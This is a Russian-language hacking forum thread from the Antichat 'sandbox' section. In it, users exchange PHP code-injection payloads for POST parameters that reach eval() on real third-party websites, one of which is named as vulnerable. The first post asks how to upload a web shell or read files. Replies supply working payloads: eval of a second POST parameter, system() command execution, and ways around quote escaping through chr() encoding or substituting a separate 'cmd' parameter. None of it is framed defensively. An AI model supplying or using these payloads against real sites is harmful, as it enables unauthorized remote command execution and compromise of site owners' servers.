HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.07.2013, 23:48
assmaday
Guest
Сообщений: n/a
Провел на форуме:
3746

Репутация: 0
По умолчанию

Нашел уязвимость в POST параметре option_id на сайте

http://www. shans.com. ua/

HackBar'ом передаю POST запрос

option_id={${$print(1)}}{${$print(1)}}{${$print(1) }}

option_id={${$phpinfo()}}

Скрипт отрабатывает.... Данные передаются в eval()

Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init()....

Непойму почему данные передаются в "{}" без ";"

Вот так не работает {${$a=1; $print($a);}...

А так выводит данные - {${$a=1}}{${$print($a)}}

в гугле не нашел как выглядит данный скрипт...

Если есть чтото подобное киньте ссылку...
 
Ответить с цитированием

  #2  
Старый 17.07.2013, 07:42
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

option_id={${eval(stripslashes($_POST

Код:
Code:
))}}&code=print 'so good';
 
Ответить с цитированием

  #3  
Старый 19.09.2016, 10:08
Nz2
Guest
Сообщений: n/a
Провел на форуме:
11340

Репутация: 0
По умолчанию

Добырый день

есть пост запрос

Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\
Кавычки экранируются, подскажите как обойти? base64 не помогло
 
Ответить с цитированием

  #4  
Старый 22.09.2016, 00:29
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Nz2  
Nz2 said:

Добырый день
есть пост запрос
Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\
Кавычки экранируются, подскажите как обойти? base64 не помогло
функцией chr()

Код:
Code:
@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(108).CHR(97)))


или подстановкой пост параметра:

Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la
 
Ответить с цитированием

  #5  
Старый 24.09.2016, 19:24
Nz2
Guest
Сообщений: n/a
Провел на форуме:
11340

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

функцией chr()
Код:
Code:
@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(108).CHR(97)))

или подстановкой пост параметра:
Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la
Большое спасибо помогло!
 
Ответить с цитированием

  #6  
Старый 26.10.2016, 13:39
GTAlex
Новичок
Регистрация: 07.09.2009
Сообщений: 1
Провел на форуме:
5451

Репутация: 0
По умолчанию

Присоединяюсь -winstrool спасибо ОГРОМНОЕ!
 
Ответить с цитированием

  #7  
Старый 26.10.2016, 15:56
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Рад, что вы рады)
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ